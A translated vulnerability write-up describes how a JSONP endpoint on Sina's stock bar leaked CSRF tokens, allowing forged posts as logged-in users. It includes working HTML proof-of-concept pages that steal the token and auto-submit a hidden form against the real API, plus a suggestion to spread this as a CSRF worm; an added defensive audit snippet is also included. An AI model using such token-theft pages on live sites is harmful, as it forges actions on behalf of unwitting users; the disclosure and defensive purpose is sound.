JSONP has been a hot topic recently. The truth is that it was played to death long ago; it simply had not received everyone's attention. Just last month I found a community CSRF in Sina that was caused by JSONP, meaning to write it up, and this article is that write-up.
Because Sina has already fixed the problem, I can share this vulnerability first. What follows is the article as I wrote it at the time.
0x01 Intro
I heard Sina was giving away clothes in May, but I did not really have the time to dig for holes. Originally I wanted to hand in a CSRF I had found two years ago that could be used to inflate follower counts, but when I dug it out the hole had long been fixed and the target site had changed.
Specifically, my old hole now 302-redirected to the Sina Stock Bar (http://guba.sina.com.cn/).
The stock market has been very hot recently and plenty of people have made money in it, so I simply opened Burp Suite and took a lap around the stock bar, and found an interesting CSRF.
Students who have played with Sina Weibo know that Sina's defence against CSRF is to check the Referer, but the stock bar's posting endpoint does not do that; unusually, it checks a token.
Capturing the request of a normal post, we can see that the body contains a _csrf_token field. After some simple fuzzing I found that this request does not check the Referer at all: as long as _csrf_token is correct, the post goes through.
So, how to get _csrf_token, I have the following ideas:
- Check whether there is a JSONP endpoint that leaks the token
- Steal the page source through Flash
Why these two ideas? Obtaining the token is necessarily a cross-domain process, and cross-domain usually means CORS, postMessage or JSONP. CORS and postMessage were not in use here, so I went looking for JSONP.
The Flash idea has been circulating for a long time; /fd wrote about it on Drops around this time last year: http://drops.wooyun.org/tips/2031
But the second method has an important precondition: we need to find a point where we control the output content, such as an upload or a JSONP endpoint. In practice such a location is not easy to find, and it is nowhere near as simple as the first method.
0x02 JSONP betrays your _csrf_token
Then I tested along those lines.
I first changed _csrf_token to a random string and sent the request, and found that it returned a result like this:
The response is a JSON-formatted string that contains a _csrf_token. Sending the same request several times, I found the token changed every time.
So I could roughly guess that the stock bar's token is generated dynamically and probably stored in the session, with a new one generated after each check.
But this return value is in JSON format, not JSONP.
So I tried adding "&callback=hehehe" to the GET parameters:
Clearly the returned format changed. It is not JSONP, but it is a <script>.
Why did adding callback=hehehe change anything? This is a development habit: when developers design an API they usually provide both a JSON and a JSONP format, and the parameter carrying the JSONP function name is usually called callback.
This <script> cannot cross the domain, though. parent.hehehe calls the hehehe function in the parent frame, but the parent frame (10.211.55.3) and guba.sina.com.cn are different origins, so Chrome reports this error:
Continuing, I changed the HTTP method to GET:
Surprise: as soon as the method is changed to GET, the response becomes JSONP.
So I tried to post using the _csrf_token obtained from this JSONP:
Sadly, it did not work...
Then I had two guesses.
- _csrf_token is tied to the HTTP method: a token fetched with GET only works for GET, and POST needs a token fetched with POST
- _csrf_token is tied to the bar id, with different ids corresponding to different tokens. The reason to suspect this is that the returned error, "Missing parameter: Bar ID or bar name", is mentioned many times.
The first guess was rejected by my programmer's intuition; I have never seen a program behave like that.
I tried the second guess, adding &bid=9947 to the URL of the GET request and sending it again:
Still in JSONP format. I put this token into the POST request once more:
It worked!
A single JSONP endpoint betrays _csrf_token outright.
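The three response shapes walked through above (plain JSON, a <script> that calls parent.hehehe, and real JSONP) are exactly what an API owner should be checking their own endpoints for. The following is an added example, not code from the original post: a small audit function that classifies a response body against the callback name that was requested, collects fields whose key looks like a token, and reports whether such a field is readable from another origin. Only a bare callback(...) wrapper counts as readable, because plain JSON cannot be read cross-origin and the parent.<callback> <script> only works when the parent frame is same-origin (the Chrome error described above). The sample bodies and token values are constructed; the function and variable names are hypothetical.

```javascript
// Added example (not from the original post): audit API responses for
// cross-origin-readable token leaks. Sample bodies below are constructed.

const SECRET_KEY_RE = /(csrf|token|secret|session)/i;

function escapeRegExp(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

function safeParse(text) {
  try { return JSON.parse(text); } catch (e) { return null; }
}

// Classify a response body relative to the callback name that was requested.
// kinds: 'json', 'script-parent-call', 'jsonp', 'unknown'
function classifyResponse(body, callbackName) {
  const text = body.trim();
  let m;
  if (/^[\[{]/.test(text)) {
    const data = safeParse(text);
    return data === null ? { kind: 'unknown', data: null } : { kind: 'json', data };
  }
  // <script>parent.callback({...});</script>: runs only if the parent frame is same-origin
  m = text.match(/^<script[^>]*>\s*parent\.([\w$]+)\s*\((.*)\)\s*;?\s*<\/script>$/is);
  if (m) {
    return { kind: 'script-parent-call', callback: m[1], data: safeParse(m[2]) };
  }
  // callback({...});: a bare function call, executable via <script src> on any origin
  const jsonp = new RegExp('^' + escapeRegExp(callbackName) + '\\s*\\((.*)\\)\\s*;?$', 's');
  m = text.match(jsonp);
  if (m) {
    return { kind: 'jsonp', callback: callbackName, data: safeParse(m[1]) };
  }
  return { kind: 'unknown', data: null };
}

// Collect dotted paths of leaf values whose key looks like a secret.
function findSecretPaths(value, path = '', out = []) {
  if (value !== null && typeof value === 'object') {
    for (const [key, child] of Object.entries(value)) {
      const p = path ? `${path}.${key}` : key;
      const isLeaf = child === null || typeof child !== 'object';
      if (isLeaf && SECRET_KEY_RE.test(key)) out.push(p);
      findSecretPaths(child, p, out);
    }
  }
  return out;
}

function auditResponse(body, callbackName) {
  const c = classifyResponse(body, callbackName);
  const leakedPaths = findSecretPaths(c.data);
  const readableCrossOrigin = c.kind === 'jsonp' && leakedPaths.length > 0;
  return { kind: c.kind, leakedPaths, readableCrossOrigin };
}

// Constructed samples mirroring the shapes seen in the post (token is a placeholder).
const TOKEN_JSON = JSON.stringify({
  result: {
    status: { code: 1, msg: 'Missing parameter: Bar ID or bar name' },
    data: { _csrf_token: 'CONSTRUCTED-TOKEN-1' },
  },
});
const SAMPLE_JSON = TOKEN_JSON;
const SAMPLE_SCRIPT = `<script>parent.hehehe(${TOKEN_JSON});</script>`;
const SAMPLE_JSONP = `hehehe(${TOKEN_JSON});`;

for (const [name, body] of [['json', SAMPLE_JSON], ['script', SAMPLE_SCRIPT], ['jsonp', SAMPLE_JSONP]]) {
  console.log(name, auditResponse(body, 'hehehe'));
}
```

Run against a proxy capture, the useful signal is any response where readableCrossOrigin is true: a session-bound value inside a callback wrapper is the precondition for the token theft this post describes, regardless of how the request had to be shaped to get there.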
0x03 Building a POC that posts arbitrary content
So I started writing a POC to automate the steps I had just done by hand. The idea is as follows:
- Get the token via JSONP
- Build a POST form and submit it
First, a simple piece of code to fetch the token:
```html
<html>
<head>
<title>Test</title>
<meta charset="utf-8">
<script type="text/javascript">
// JSONP callback: the response calls hehehe(...) with the parsed object
function hehehe(obj){
    console.log(obj);
    alert(obj["result"]["data"]["_csrf_token"]);
}
</script>
<!-- the JSONP request found above: the safe_post API requested with GET, a bid and a callback name;
     the URL is assembled from the requests described in the text -->
<script type="text/javascript" src="http://guba.sina.com.cn/api/?s=Thread&a=safe_post&bid=9947&callback=hehehe"></script>
</head>
</html>
```
Effect (screenshot): the token has been obtained.
Next, embed the obtained token into a form and submit it:
```html
<html>
<head>
<title>Test</title>
<meta charset="utf-8">
</head>
<body>
<!-- the posting request captured earlier, rebuilt as a hidden form -->
<form action="http://guba.sina.com.cn/api/?s=Thread&a=safe_post" method="POST" id="csrfsend">
    <input type="hidden" name="bid" value="9947">
    <input type="hidden" name="tid" value="">
    <input type="hidden" name="content" value="This is the test result">
    <input type="hidden" name="title" value="This is the test title">
    <input type="hidden" id="token" name="_csrf_token" value="">
    <input type="hidden" name="anonymous" value="1">
</form>
<script type="text/javascript">
// JSONP callback: copy the leaked token into the form and submit it
function hehehe(obj){
    console.log(obj);
    var csrf_token = obj["result"]["data"]["_csrf_token"];
    document.getElementById("token").value = csrf_token;
    document.getElementById("csrfsend").submit();
}
</script>
<!-- same JSONP request as before (URL assembled from the requests described in the text) -->
<script type="text/javascript" src="http://guba.sina.com.cn/api/?s=Thread&a=safe_post&bid=9947&callback=hehehe"></script>
</body>
</html>
```
Save the code above as sinacsrf.html; any logged-in user who visits it triggers the request and publishes a new post in bar 9947:
As you can see, it was published (screenshot):
This is a typical CSRF vulnerability in which JSONP is used to steal the token and bypass the back-end check.
The link to this page could also be pasted into the post itself, luring other users to click; each visit posts again, resulting in a CSRF worm.
A community CSRF worm in Sina caused by JSONP hijacking